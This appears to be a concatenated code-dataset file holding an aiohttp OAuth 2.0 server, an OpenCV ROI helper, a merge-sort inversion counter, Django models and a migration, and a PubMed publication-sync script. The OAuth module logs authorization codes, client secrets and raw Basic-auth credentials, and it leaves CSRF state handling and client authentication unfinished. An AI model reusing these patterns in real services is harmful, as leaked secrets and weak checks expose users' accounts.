from ..const import CONF_TOKEN_LIFETIME
from .auth_client import AuthenticationClient
from .auth_database import AuthDatabase
# Module-level logger for the authentication endpoints.
_LOGGER = logging.getLogger(__name__)
# NOTE(review): configuring the root logger to DEBUG at import time is
# unusual for a library module -- confirm this is intended.
logging.basicConfig(level=logging.DEBUG)
class Authentication:
    """OAuth 2.0 (authorization-code grant) endpoints for an aiohttp app.

    Registers the ``/oauth/authorize``, ``/oauth/token``, ``/revoke`` and
    ``/protected`` routes on the given application. Credential checks and
    token persistence are delegated to the supplied ``AuthDatabase``.
    """

    # list of registered auth clients
    # NOTE(review): this is a CLASS attribute, shared by every Authentication
    # instance in the process -- confirm that is intended.
    auth_clients: List[AuthenticationClient] = []

    def __init__(
        self,
        core: "ApplicationCore",
        application: web.Application,
        auth_database: AuthDatabase,
    ):
        self.core = core
        self.app = application
        self.authorization = self.core.authorization
        self.auth_database = auth_database
        # Authorization Endpoint: obtain an authorization grant
        self.app.router.add_get(
            path="/oauth/authorize", handler=self.authorization_endpoint_get
        )
        self.app.router.add_post(
            path="/oauth/authorize", handler=self.authorization_endpoint_post
        )
        # Token Endpoint: obtain an access token by authorization grant or refresh token
        self.app.router.add_post(
            path="/oauth/token", handler=self.token_endpoint_handler
        )
        self.app.router.add_post("/revoke", self.revoke_token_handler, name="revoke")
        self.app.router.add_get("/protected", self.protected_handler, name="protected")

    def add_client(self, auth_client: AuthenticationClient) -> None:
        """Register an OAuth client so it may use these endpoints."""
        self.auth_clients.append(auth_client)

    async def revoke_token_handler(self, request: web.Request) -> web.StreamResponse:
        """
        Revoke the request token and all associated access tokens [RFC 7009]
        See Section 2.1: https://tools.ietf.org/html/rfc7009#section-2.1
        """
        _LOGGER.info("POST /revoke")
        # Caller must present a valid access token before anything is revoked.
        await self.check_authorized(request)
        data = await request.post()
        # NOTE(review): KeyError (-> HTTP 500) if "token" is absent from the
        # form body; RFC 7009 suggests a 400 invalid_request instead.
        token_to_revoke = data["token"]
        await self.auth_database.revoke_token(token_to_revoke)
        return web.Response(status=200)

    async def protected_handler(self, request: web.Request) -> web.StreamResponse:
        """Example endpoint requiring the "library:read" scope."""
        _LOGGER.warning("GET /protected")
        await self.check_permission(request, "library:read")
        response = web.Response(body=b"You are on protected page")
        return response

    @aiohttp_jinja2.template("authorize.jinja2")
    async def authorization_endpoint_get(
        self, request: web.Request
    ) -> web.StreamResponse:
        """
        Validate the request to ensure that all required parameters are present and valid.
        See Section 4.1.1: https://tools.ietf.org/html/rfc6749#section-4.1.1

        On success returns a template-context dict (rendered to HTML by the
        aiohttp_jinja2 decorator); on error returns a JSON response directly.
        """
        try:
            _LOGGER.debug(f"GET /oauth/authorize from: {request.host}")
            response_type = request.query.get("response_type")
            client_id = request.query.get("client_id")
            # validate required params
            if response_type is None or client_id is None:
                _LOGGER.warning("The response is missing a response_type or client_id.")
                data = """{
                    "error": "invalid_request",
                    "error_description": "The request is missing a required parameter"
                }"""
                return web.json_response(json.loads(data))
            # check if client is known
            if not any(client.client_id == client_id for client in self.auth_clients):
                _LOGGER.warning("The client_id is unknown!")
                data = """{
                    "error":"unauthorized_client",
                    "error_description":"The client is not authorized to request an authorization code using this method."
                }"""
                return web.json_response(json.loads(data))
            # validate response_type
            if response_type != "code":
                _LOGGER.warning(
                    f"The request is using an invalid response_type: {response_type}"
                )
                data = """{
                    "error":"unsupported_response_type",
                    "error_description":"The request is using an invalid response_type"
                }"""
                return web.json_response(json.loads(data))
            redirect_uri = request.query.get("redirect_uri")
            # extract client from registered auth_clients with matching client_id
            # (cannot be None here: the any() check above guaranteed a match)
            registered_auth_client = next(
                filter(lambda client: client.client_id == client_id, self.auth_clients),
                None,
            )
            # validate if redirect_uri is in registered_auth_client
            if not any(
                uri == redirect_uri for uri in registered_auth_client.redirect_uris
            ):
                _LOGGER.error(f"redirect uri not found: {redirect_uri}")
                data = """{
                    "error":"unauthorized_client",
                    "error_description":"The redirect_uri is unknown"
                }"""
                return web.json_response(json.loads(data))
            scope = request.query.get("scope")
            # NOTE(review): if "scope" is absent this is None.split(" ") ->
            # AttributeError, which falls into the server_error handler below.
            requested_scopes = scope.split(" ")
            # TODO: validate scopes with regex => 1*( %x21 / %x23-5B / %x5D-7E ))
            registered_scopes = [
                "openid",
                "profile",
                "email",
                "phone",
                "library:read",
                "library:append",
                "library:edit",
                "library:write",
                "library:share",
                "admin.users:read",
                "admin.users:invite",
                "admin.users:write",
            ]
            _LOGGER.debug(
                f"found {len(registered_scopes)} registered scopes and {len(requested_scopes)} requested scopes."
            )
            # check if the requested scope is registered
            for requested_scope in requested_scopes:
                if requested_scope not in registered_scopes:
                    _LOGGER.error(
                        f"The requested scope '{requested_scope}' is invalid, unknown, or malformed."
                    )
                    data = """{
                        "error":"invalid_scope",
                        "error_description":"The requested scope is invalid, unknown, or malformed."
                    }"""
                    return web.json_response(json.loads(data))
            # persist state to preventing cross-site request forgery [Section 10.12](https://tools.ietf.org/html/rfc6749#section-10.12)
            # state = request.query.get("state")
            # TODO: add scopes & localized descriptions only for requested scopes
            # NOTE(review): the "permissions" list below is static and uses
            # dotted scope names ("library.write") while the registered list
            # above uses colon form ("library:write") -- confirm which is right.
            return {
                "requesting_app": registered_auth_client.client_name,
                "permissions": [
                    {
                        "scope": "openid",
                        "localized": "access the users public profile e.g.: username",
                    },
                    {
                        "scope": "profile",
                        "localized": "access the users personal profile information e.g.: firstname, lastname",
                    },
                    {
                        "scope": "email",
                        "localized": "access the users associated email address.",
                    },
                    {
                        "scope": "phone",
                        "localized": "access the users associated phone number.",
                    },
                    # {
                    #     "scope": "library.read",
                    #     "localized": "Read only Grant the user to list all photos owned by the user.",
                    # },
                    # {
                    #     "scope": "library.append",
                    #     "localized": "Limited write access Grant the user to add new photos, create new albums.",
                    # },
                    # {
                    #     "scope": "library.edit",
                    #     "localized": "Grant the user to edit photos owned by the user.",
                    # },
                    {
                        "scope": "library.write",
                        "localized": "Grant the user to add and edit photos, albums, tags.",
                    },
                    # {
                    #     "scope": "library.share",
                    #     "localized": "Grant the user to create new shares (photos/videos/albums).",
                    # },
                    # {
                    #     "scope": "admin.users:read",
                    #     "localized": "Grant the user to list users on the system.",
                    # },
                    # {
                    #     "scope": "admin.users:invite",
                    #     "localized": "Grant the user to invite new users to the system.",
                    # },
                    # {
                    #     "scope": "admin.users:write",
                    #     "localized": "Grant the user to manage users on the system.",
                    # },
                ],
            }
        except Exception as e:
            # This error code is needed because a 500 Internal Server
            # Error HTTP status code cannot be returned to the client via an HTTP redirect.
            _LOGGER.error(f"an unexpected error happened: {e}")
            data = """{
                "error":"server_error",
                "error_description":"The authorization server encountered an unexpected condition that prevented it from fulfilling the request."
            }"""
            return web.json_response(json.loads(data))

    async def authorization_endpoint_post(
        self, request: web.Request
    ) -> web.StreamResponse:
        """
        Validate the resource owners credentials.

        On success redirects back to the client's redirect_uri with an
        authorization code; on failure redirects with an error parameter.
        """
        _LOGGER.debug("POST /oauth/authorize")
        data = await request.post()
        # NOTE(review): KeyError (-> HTTP 500) if redirect_uri is missing
        # from the query string.
        redirect_uri = request.query["redirect_uri"]
        if "client_id" not in request.query:
            _LOGGER.warning("invalid form")
            raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client")
        client_id = request.query["client_id"]
        _LOGGER.debug(f"client_id {client_id}")
        state = None
        if "state" in request.query:
            state = request.query["state"]
            _LOGGER.debug(f"state {state}")
        # check if client is known
        if not any(client.client_id == client_id for client in self.auth_clients):
            _LOGGER.warning(f"unknown client_id {client_id}")
            if state is not None:
                raise web.HTTPFound(
                    f"{redirect_uri}?error=unauthorized_client&state={state}"
                )
            else:
                raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client")
        # extract client from registered auth_clients with matching client_id
        # (cannot be None here: the any() check above guaranteed a match)
        registered_auth_client = next(
            filter(lambda client: client.client_id == client_id, self.auth_clients),
            None,
        )
        # validate if redirect_uri is in registered_auth_client
        if not any(uri == redirect_uri for uri in registered_auth_client.redirect_uris):
            _LOGGER.error(f"invalid redirect_uri {redirect_uri}")
            if state is not None:
                raise web.HTTPFound(
                    f"{redirect_uri}?error=unauthorized_client&state={state}"
                )
            else:
                raise web.HTTPFound(f"{redirect_uri}?error=unauthorized_client")
        # NOTE(review): KeyError if the login form omits email/password.
        email = data["email"].strip(" ").lower()
        password = data["password"]
        # validate credentials
        credentials_are_valid = await self.auth_database.check_credentials(
            email, password
        )
        if credentials_are_valid:
            # create an authorization code
            authorization_code = self.auth_database.create_authorization_code(
                email, client_id, request.remote
            )
            _LOGGER.debug(f"authorization_code: {authorization_code}")
            if authorization_code is None:
                _LOGGER.warning("could not create auth code for client!")
                error_reason = "access_denied"
                if state is not None:
                    raise web.HTTPFound(
                        f"{redirect_uri}?error={error_reason}&state={state}"
                    )
                else:
                    raise web.HTTPFound(f"{redirect_uri}?error={error_reason}")
            # Success: hand the code back to the client via redirect,
            # echoing state when the client supplied one (CSRF protection).
            if state is not None:
                _LOGGER.debug(
                    f"HTTPFound: {redirect_uri}?code={authorization_code}&state={state}"
                )
                redirect_response = web.HTTPFound(
                    f"{redirect_uri}?code={authorization_code}&state={state}"
                )
            else:
                _LOGGER.debug(f"HTTPFound: {redirect_uri}?code={authorization_code}")
                redirect_response = web.HTTPFound(
                    f"{redirect_uri}?code={authorization_code}"
                )
            raise redirect_response
        else:
            error_reason = "access_denied"
            _LOGGER.warning(f"redirect with error {error_reason}")
            if state is not None:
                raise web.HTTPFound(
                    f"{redirect_uri}?error={error_reason}&state={state}"
                )
            else:
                raise web.HTTPFound(f"{redirect_uri}?error={error_reason}")

    async def token_endpoint_handler(self, request: web.Request) -> web.StreamResponse:
        """
        Access Token: https://tools.ietf.org/html/rfc6749#section-4.1.3
        Refresh Token: https://tools.ietf.org/html/rfc6749#section-6

        Dispatches on grant_type to the authorization-code or refresh-token
        flow handlers below.
        """
        _LOGGER.debug("POST /oauth/token")
        data = await request.post()
        # grant_type is REQUIRED
        if "grant_type" not in data:
            _LOGGER.warning("no grant_type specified!")
            # NOTE(review): `data` is rebound from the form mapping to a JSON
            # string here (and below) -- confusing but harmless.
            data = '{"error":"invalid_request"}'
            return web.json_response(json.loads(data))
        grant_type = data["grant_type"]
        # switch flow based on grant_type
        if grant_type == "authorization_code":
            return await self._handle_authorization_code_request(data)
        elif grant_type == "refresh_token":
            return await self._handle_refresh_token_request(request, data)
        else:
            _LOGGER.warning(f"invalid grant_type! {grant_type}")
            data = '{"error":"invalid_request"}'
            return web.json_response(json.loads(data))

    async def _handle_authorization_code_request(self, data) -> web.StreamResponse:
        """
        See Section 4.1.3: https://tools.ietf.org/html/rfc6749#section-4.1.3

        Exchanges a previously issued authorization code for an access token
        and a refresh token. ``data`` is the POSTed form mapping.
        """
        # grant_type already checked
        # code is REQUIRED
        if "code" not in data:
            _LOGGER.warning("code param not provided!")
            data = {"error": "invalid_request"}
            return web.json_response(status=400, data=data)
        code = data["code"]
        # redirect_uri is REQUIRED
        if "redirect_uri" not in data:
            _LOGGER.warning("redirect_uri param not provided!")
            data = {"error": "invalid_request"}
            return web.json_response(status=400, data=data)
        redirect_uri = data["redirect_uri"]
        # TODO: compare redirect_uri with previous call
        _LOGGER.debug(f"TODO: compare redirect_uri {redirect_uri}")
        # client_id is REQUIRED
        if "client_id" not in data:
            data = {"error": "invalid_request"}
            return web.json_response(status=400, data=data)
        client_id = data["client_id"]
        client_code_valid = await self.auth_database.validate_authorization_code(
            code, client_id
        )
        if not client_code_valid:
            _LOGGER.error("authorization_code invalid!")
            payload = {"error": "invalid_grant"}
            return web.json_response(status=400, data=payload)
        access_token, refresh_token = await self.auth_database.create_tokens(
            code, client_id
        )
        payload = {
            "access_token": access_token,
            "token_type": "Bearer",
            "expires_in": CONF_TOKEN_LIFETIME,
            "refresh_token": refresh_token,
        }
        return web.json_response(status=200, data=payload)

    async def _handle_refresh_token_request(
        self, request: web.Request, data
    ) -> web.StreamResponse:
        """
        See Section 6: https://tools.ietf.org/html/rfc6749#section-6

        Exchanges a refresh token (plus client credentials from either the
        form body or HTTP Basic auth) for a fresh token pair.
        """
        # refresh_token is REQUIRED
        if "refresh_token" not in data:
            _LOGGER.warning("refresh token not provided!")
            data = {"error": "invalid_request"}
            return web.json_response(data)
        refresh_token = data["refresh_token"]
        # check if client_id and client_secret are provided as request parameters or HTTP Basic auth header
        # NOTE(review): if NEITHER branch below matches, client_id/client_secret
        # are never bound and the code after raises NameError (-> HTTP 500).
        if "client_id" in data and "client_secret" in data:
            # handle request parameters
            client_id = data["client_id"]
            client_secret = data["client_secret"]
        elif hdrs.AUTHORIZATION in request.headers:
            # handle basic headers
            auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split(" ", 1)
            if auth_type != "Basic":
                # NOTE(review): returning False from an aiohttp handler is a
                # bug -- this should be an error response (e.g. 401).
                return False
            # TODO: split auth_val in client_id and client_secret
            _LOGGER.error(f"split token into client_id and client_secret: {auth_val}")
            client_id = ""
            client_secret = ""
        # NOTE(review): next(..., None) can yield None here (unknown client_id),
        # making the attribute access below raise AttributeError.
        registered_auth_client = next(
            filter(lambda client: client.client_id == client_id, self.auth_clients),
            None,
        )
        _LOGGER.debug(f"client_id: {client_id}, {registered_auth_client}")
        if not registered_auth_client.client_secret == client_secret:
            _LOGGER.error("client_id does not match with client_secret")
            data = {"error": "invalid_client"}
            return web.json_response(data)
        access_token, refresh_token = await self.auth_database.renew_tokens(
            client_id, refresh_token
        )
        if access_token is None:
            raise web.HTTPForbidden()
        payload = {
            "access_token": access_token,
            "token_type": "Bearer",
            "expires_in": CONF_TOKEN_LIFETIME,
            "refresh_token": refresh_token,
        }
        return web.json_response(payload)

    def create_client(self) -> None:
        """Generate a client_id and client_secret to add new clients.

        The values are only logged; nothing is returned or persisted here.
        """
        client_id = uuid.uuid4()
        client_secret = secrets.token_urlsafe(16)
        _LOGGER.info(f"generated client_id: {client_id}")
        _LOGGER.info(f"generated client_secret: {client_secret}")

    async def check_authorized(self, request: web.Request) -> Optional[str]:
        """Check if authorization header and returns user ID if valid

        Raises HTTPForbidden when the header is missing, malformed, or the
        token fails validation.
        """
        if hdrs.AUTHORIZATION in request.headers:
            try:
                # NOTE(review): auth_type is split off but never checked
                # (e.g. for "Bearer") -- confirm whether that matters here.
                auth_type, auth_val = request.headers.get(hdrs.AUTHORIZATION).split(
                    " ", 1
                )
                if not await self.auth_database.validate_access_token(auth_val):
                    raise web.HTTPForbidden()
                return await self.auth_database.user_id_for_token(auth_val)
            except ValueError:
                # If no space in authorization header
                _LOGGER.debug("invalid authorization header!")
                raise web.HTTPForbidden()
        else:
            _LOGGER.debug("missing authorization header!")
            raise web.HTTPForbidden()

    async def check_permission(self, request: web.Request, scope: str) -> None:
        """Check if given authorization header is valid and user has granted access to given scope."""
        # check if user is authorized
        await self.check_authorized(request)
        # check if required scope is granted
        await self.core.authorization.check_scope(scope)
| 20,227 | 5,338 |
import cv2
def process_background(background, track_options):
    """Extract the session background (first frame of the first video) and
    optionally let the user outline the Shelter/Threat/Task ROIs on it.

    Returns (edge_map, rois) where edge_map is the Canny edges of the blurred
    background and rois maps ROI name -> cv2.selectROI result (or None).
    """
    print(' ... extracting background')
    cv2.startWindowThread()

    # Work on a single-channel image regardless of the input's colour depth.
    if len(background.shape) == 3:
        grayscale = cv2.cvtColor(background, cv2.COLOR_BGR2GRAY)
    else:
        grayscale = background

    blurred = cv2.blur(grayscale, (15, 15))
    edge_map = cv2.Canny(blurred, 25, 30)

    rois = dict.fromkeys(('Shelter', 'Threat', 'Task'))
    if track_options['bg get rois']:  # Get user to define Shelter ROI
        for roi_name in rois:
            print('\n\nPlease mark {}'.format(roi_name))
            rois[roi_name] = cv2.selectROI(grayscale, fromCenter=False)
    return edge_map, rois
| 785 | 263 |
#!/bin/python3
import math
import os
import random
import re
import sys
# This solution times out on Hackerrank with Python 3
# However, it passes all test cases with Pypy 3
def countInversions(arr):
    """Return the number of inversions in *arr* (pairs i < j with arr[i] > arr[j]).

    Uses an O(n log n) merge-sort-based count. The module-global
    COUNT_INVERSIONS is still set for backward compatibility, but the count
    no longer relies on the sibling mergeSort() mutating shared global state
    (the original coupling made the two functions order-dependent).
    """
    global COUNT_INVERSIONS

    def _sort_and_count(seq):
        # Returns (sorted copy of seq, number of inversions within seq).
        if len(seq) <= 1:
            return seq, 0
        mid = len(seq) // 2
        left, inv_left = _sort_and_count(seq[:mid])
        right, inv_right = _sort_and_count(seq[mid:])
        merged = []
        inversions = inv_left + inv_right
        i = j = 0
        while i < len(left) and j < len(right):
            if left[i] <= right[j]:
                merged.append(left[i])
                i += 1
            else:
                # right[j] jumps ahead of every remaining left element.
                merged.append(right[j])
                j += 1
                inversions += len(left) - i
        merged.extend(left[i:])
        merged.extend(right[j:])
        return merged, inversions

    _, COUNT_INVERSIONS = _sort_and_count(list(arr))
    return COUNT_INVERSIONS
def mergeSort(arr):
    """Return a sorted copy of *arr*, adding the number of split inversions
    encountered to the module-global COUNT_INVERSIONS.

    Fix: the original read-modified COUNT_INVERSIONS without ever
    initialising it, so calling mergeSort() directly (without
    countInversions() resetting the global first) raised NameError.
    The counter is now initialised to 0 on first use; behaviour when
    called via countInversions() is unchanged.
    """
    global COUNT_INVERSIONS
    if 'COUNT_INVERSIONS' not in globals():
        COUNT_INVERSIONS = 0
    if (len(arr) <= 1):
        return arr
    # Split the array in two
    # Recursively sort both halves
    middle = len(arr) // 2
    arrLeft = mergeSort(arr[:middle])
    arrRight = mergeSort(arr[middle:])
    # Merge the two halves
    mergedArray = []
    leftIndex = 0
    rightIndex = 0
    # Iterate through both lists and append the smaller element
    while(leftIndex < len(arrLeft) and rightIndex < len(arrRight)):
        if(arrLeft[leftIndex] <= arrRight[rightIndex]):
            mergedArray.append(arrLeft[leftIndex])
            leftIndex += 1
        else:
            # Every element still waiting in the left half forms an
            # inversion with the right-half element just emitted.
            mergedArray.append(arrRight[rightIndex])
            rightIndex += 1
            COUNT_INVERSIONS += len(arrLeft) - leftIndex
    # Append any left over elements
    mergedArray.extend(arrLeft[leftIndex:])
    mergedArray.extend(arrRight[rightIndex:])
    return mergedArray
if __name__ == '__main__':
    # HackerRank harness: results go to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    num_test_cases = int(input())
    for _test_case in range(num_test_cases):
        _ = int(input())  # declared array length -- unused, len(arr) suffices
        arr = list(map(int, input().rstrip().split()))
        result = countInversions(arr)
        fptr.write(str(result) + '\n')
    fptr.close()
| 1,553 | 488 |
from django.db import models
# Create your models here.
class Post(models.Model):
    """A user post consisting of free-form text and a creation timestamp."""
    content = models.TextField()
    # NOTE(review): no auto_now_add/default -- created_at must be supplied
    # explicitly on save; confirm that is intended.
    created_at = models.DateTimeField()

    def __str__(self):
        # Shown in the admin/shell: the full post body.
        return self.content
class Comment(models.Model):
    """A short comment attached to a Post; deleted along with its post (CASCADE)."""
    comment = models.CharField(max_length=200)
    # NOTE(review): like Post.created_at, no auto_now_add -- must be set by caller.
    created_at = models.DateTimeField()
    post = models.ForeignKey(Post, on_delete=models.CASCADE)

    def __str__(self):
        # Shown in the admin/shell: the comment text.
        return self.comment
# Generated by Django 3.0.6 on 2020-06-06 12:38
from django.db import migrations
class Migration(migrations.Migration):
    """Appears to be a merge migration: reconciles the 0005 and 0013 branches
    of the gymkhana app without applying any schema changes (operations is empty)."""

    dependencies = [
        ('gymkhana', '0005_auto_20200605_0937'),
        ('gymkhana', '0013_event_info'),
    ]

    operations = [
    ]
| 267 | 119 |
#!/usr/bin/env python3
# -*- coding: latin-1 -*-
from Bio import Entrez
from Bio import Medline
import argparse
import os
import csv
import logging
import encodedcc
# Usage epilog appended to --help output (argparse substitutes %(prog)s).
EPILOG = '''
Takes in a VERY specific file format to use for updating the publications
Also can update the existing publications using the pubmed database
An EMAIL is required to run this script
This is for the Entrez database
This is a dryrun default script
This script requires the BioPython module
Options:
%(prog)s --consortium Consortium_file.txt
This takes the consortium file
%(prog)s --community Community_file.txt
This takes the community file
%(prog)s --updateonly list.txt
Takes file with single column of publication UUIDs, checks against PubMed \
to ensure data is correct and will update if needed
'''
# Module-level logger used throughout the publication-update helpers.
logger = logging.getLogger(__name__)
def getArgs():
    """Parse the command line and configure file logging.

    Returns the parsed argparse Namespace. Logging is written to the file
    named by --outfile (DEBUG level when --debug is set, INFO otherwise).
    """
    parser = argparse.ArgumentParser(
        description=__doc__, epilog=EPILOG,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('--consortium',
                        help="File with consortium publication information")
    parser.add_argument('--community',
                        help="File with community publication information")
    parser.add_argument('--outfile',
                        help="Output file name", default='publication_results.txt')
    parser.add_argument('--key',
                        help="The keypair identifier from the keyfile.",
                        default='default')
    parser.add_argument('--keyfile',
                        help="The keyfile",
                        default=os.path.expanduser('~/keypairs.json'))
    parser.add_argument('--debug',
                        help="Debug prints out HTML requests and returned JSON \
objects. Default is off",
                        action='store_true',
                        default=False)
    parser.add_argument('--update',
                        help="Run script and PATCH objects as needed. \
Default is off",
                        action='store_true',
                        default=False)
    parser.add_argument('--create',
                        help="Run script and POST new objects as needed. \
Default is off",
                        action='store_true',
                        default=False)
    parser.add_argument('--createonly',
                        help="Run script and POST new objects as needed,\
only look up as needed. Default is off",
                        action='store_true',
                        default=False)
    parser.add_argument('--updateonly',
                        help="File containing publication UUIDS from ENCODE database for\
updating. If the publication does not have PMID the script will\
find it comparing based on title and assuming unique title")
    parser.add_argument('email',
                        help="Email needed to make queries to Entrez process")
    args = parser.parse_args()
    if args.debug:
        logging.basicConfig(filename=args.outfile, filemode="w",
                            format='%(levelname)s:%(message)s',
                            level=logging.DEBUG)
    else:  # use the default logging level
        logging.basicConfig(filename=args.outfile, filemode="w",
                            format='%(levelname)s:%(message)s',
                            level=logging.INFO)
    # Silence per-request noise from the requests library.
    logging.getLogger("requests").setLevel(logging.WARNING)
    return args
class PublicationUpdate:
def __init__(self, arguments):
self.MAPPING = {"abstract": "AB", "authors": "AU", "title": "TI",
"volume": "VI", "journal": "JT", "date_published": "DP",
"page": "PG", "issue": "IP"}
self.entrezDict = {}
self.PATCH_COUNT = 0
self.POST_COUNT = 0
args = arguments
self.UPDATE = args.update
self.CREATE = args.create or args.createonly
self.CREATE_ONLY = args.createonly
self.UPDATE_ONLY = args.updateonly
self.community = args.community
self.consortium = args.consortium
if self.UPDATE:
print("Will PATCH publication objects as needed")
if self.CREATE:
print("POST new pubmeds")
    def setup_publication(self):
        """Load the consortium and community TSV files into per-PMID dicts.

        Populates self.consortium_dict / self.community_dict (PMID -> extra
        data) and the matching *_ids key lists. Files are tab-separated,
        ISO-8859-1 encoded.
        """
        '''consortium publications file'''
        self.consortium_dict = {}
        with open(self.consortium, 'r', encoding='ISO-8859-1') as f:
            reader = csv.reader(f, delimiter='\t')
            # NOTE(review): unpacking requires EXACTLY 7 columns per row; a
            # malformed line raises ValueError here.
            for PMID, published_by, categories, catch1, code, catch2, title in reader:
                # Normalise ';' separators to ',' before splitting into lists.
                categories = categories.replace(";", ",").rstrip(" ")
                published_by = published_by.replace(";", ",").rstrip(" ")
                cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")]
                pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")]
                temp = {"published_by": pub, "categories": cat}
                self.consortium_dict[PMID] = temp
        self.consortium_ids = list(self.consortium_dict.keys())
        '''community publications file'''
        self.community_dict = {}
        with open(self.community, 'r', encoding='ISO-8859-1') as f:
            reader = csv.reader(f, delimiter='\t')
            # NOTE(review): community rows must have exactly 23 columns;
            # only the first four and the title are actually used.
            for PMID, published_by, categories, data_used, catch1, catch2, title, catch3, catch4, catch5, catch6, catch7, catch8, catch9, catch10, catch11, catch12, catch13, catch14, catch15, catch16, catch17, catch18 in reader:
                categories = categories.replace(";", ",").rstrip(" ")
                published_by = published_by.replace(";", ",").rstrip(" ")
                cat = [x.strip(' ').lower() for x in categories.rstrip(',').split(",")]
                pub = [x.strip(' ') for x in published_by.rstrip(',').split(",")]
                temp = {"published_by": pub, "categories": cat, "data_used": data_used}
                self.community_dict[PMID] = temp
        self.community_ids = list(self.community_dict.keys())
def get_entrez(self, idList):
'''gets the values from Entrez
'''
handle = Entrez.efetch(db="pubmed", id=idList,
rettype="medline", retmode="text")
# records is an iterator, so you can iterate through the records only once
records = Medline.parse(handle)
# save the records, you can convert them to a list
records = list(records)
for record in records:
tempDict = {}
for key in self.MAPPING.keys():
if key == "authors":
auth = ", ".join(str(x) for x in record.get("AU", []))
tempDict["authors"] = auth
else:
tempDict[key] = record.get(self.MAPPING.get(key), "")
self.entrezDict[record.get("PMID")] = tempDict
def check_ENCODE(self, idList, connection, otherIdList=[], bothDicts={}):
for pmid in idList:
extraData = bothDicts.get(pmid)
ENCODEvalue = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=PMID:" + pmid, connection)
if ENCODEvalue.get("@graph"):
log = "PMID " + pmid + " is listed in ENCODE"
logger.info('%s' % log)
uuid = ENCODEvalue.get("@graph")[0].get("uuid")
if not self.CREATE_ONLY:
self.compare_entrez_ENCODE(uuid, pmid, connection, extraData)
else:
if self.CREATE_ONLY:
self.get_entrez([pmid])
titleEntrez = self.entrezDict[pmid].get("title")
found = False
for otherID in otherIdList:
titleENCODE = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=" + otherID, connection)
if titleENCODE.get("title") == titleEntrez:
log = pmid + " is in ENCODE by a different name " + titleENCODE.get("uuid")
logger.warning('%s' % log)
self.compare_entrez_ENCODE(titleENCODE.get("uuid"), pmid, connection, extraData)
if self.UPDATE:
newIdent = titleENCODE.get("identifiers")
newIdent.append("PMID:" + pmid)
patch_dict = {"identifiers": newIdent}
encodedcc.patch_ENCODE(titleENCODE.get("uuid"), connection, patch_dict)
found = True
if found is False:
log = "This publication is not listed in ENCODE " + pmid
logger.warning('%s' % log)
if self.CREATE:
self.POST_COUNT += 1
pmidData = self.entrezDict[pmid]
log = "POSTing the new object: " + pmid
logger.info('%s' % log)
post_dict = {
"title": pmidData.get("title"),
"abstract": pmidData.get("abstract"),
"submitted_by": "/users/8b1f8780-b5d6-4fb7-a5a2-ddcec9054288/",
"lab": "/labs/encode-consortium/",
"award": "/awards/ENCODE/",
"categories": extraData.get("categories"),
"published_by": extraData.get("published_by"),
"date_published": pmidData.get("date_published"),
"authors": pmidData.get("authors"),
"identifiers": ["PMID:" + pmid],
"journal": pmidData.get("journal"),
"volume": pmidData.get("volume"),
"issue": pmidData.get("issue"),
"page": pmidData.get("page"),
"status": "published"
}
if extraData.get("data_used"):
post_dict["data_used"] = extraData.get("data_used")
encodedcc.new_ENCODE(connection, "publications", post_dict)
def compare_entrez_ENCODE(self, uuid, pmid, connection, extraData=None):
    '''compares value in ENCODE database to results from Entrez

    Logs one line per compared key.  When UPDATE/UPDATE_ONLY is set,
    PATCHes differing or missing values into the ENCODE object and bumps
    PATCH_COUNT once if anything was patched.

    extraData now defaults to None (normalized to {} below) instead of a
    mutable default dict, which is shared across calls in Python.
    '''
    if extraData is None:
        extraData = {}
    encode = encodedcc.get_ENCODE(uuid, connection)
    entrez = self.entrezDict.get(pmid)
    patch = False
    if not entrez:
        log = "PMID " + pmid + " was not found in Entrez database!!"
        logger.warning('%s' % log)
    else:
        log = "PMID " + pmid
        logger.info('%s' % log)
        # compare every Entrez-derived field against the ENCODE object
        for key in entrez.keys():
            if key in encode.keys():
                if entrez[key] == encode[key]:
                    log = "entrez key \"" + key + "\" matches encode key"
                    logger.info('%s' % log)
                else:
                    log = "\"" + key + "\" value in encode database does not match value in entrez database"
                    logger.warning('%s' % log)
                    log = "\tENTREZ: " + entrez[key] + "\n\tENCODE: " + encode[key]
                    logger.warning('%s' % log)
                    if self.UPDATE or self.UPDATE_ONLY:
                        log = "PATCH in the new value for \"" + key + "\""
                        logger.info('%s' % log)
                        patch_dict = {key: entrez[key]}
                        encodedcc.patch_ENCODE(uuid, connection, patch_dict)
                        patch = True
            else:
                log = "ENCODE missing \"" + key + "\" from Entrez. New key and value must be added"
                logger.warning('%s' % log)
                if self.UPDATE or self.UPDATE_ONLY:
                    log = "PATCHing in new key \"" + key + "\""
                    logger.info('%s' % log)
                    patch_dict = {key: entrez[key]}
                    encodedcc.patch_ENCODE(uuid, connection, patch_dict)
                    patch = True
    if not self.UPDATE_ONLY:
        # extraData holds file-provided fields (published_by, categories, ...)
        for key in extraData.keys():
            if type(extraData.get(key)) is list:
                # list-valued fields compare as sets (order-insensitive)
                if set(encode.get(key, [])) == set(extraData.get(key, [])):
                    log = "encode \"" + key + "\" matches data in file"
                    logger.info('%s' % log)
                else:
                    log = "encode \"" + key + "\" value" + str(encode.get(key, [])) + "does not match file"
                    logger.warning('%s' % log)
                    if self.UPDATE:
                        if any(extraData[key]):
                            patch_dict = {key: extraData[key]}
                            encodedcc.patch_ENCODE(uuid, connection, patch_dict)
                            patch = True
                        else:
                            log = "No value in file to input for \"" + key + "\""
                            logger.warning('%s' % log)
            if type(extraData.get(key)) is str:
                if encode.get(key, "") == extraData.get(key, ""):
                    log = "encode \"" + key + "\" matches data in file"
                    logger.info('%s' % log)
                else:
                    log = "encode \"" + key + "\" value" + str(encode.get(key, "")) + "does not match file"
                    logger.warning('%s' % log)
                    if self.UPDATE:
                        patch_dict = {key: extraData[key]}
                        encodedcc.patch_ENCODE(uuid, connection, patch_dict)
                        patch = True
    # a publication that is being synced should be visible/published
    if encode.get("status", "") != "published" and (self.UPDATE or self.UPDATE_ONLY):
        log = "Setting status to published"
        logger.info('%s' % log)
        encodedcc.patch_ENCODE(uuid, connection, {"status": "published"})
        patch = True
    if patch is True:
        self.PATCH_COUNT += 1
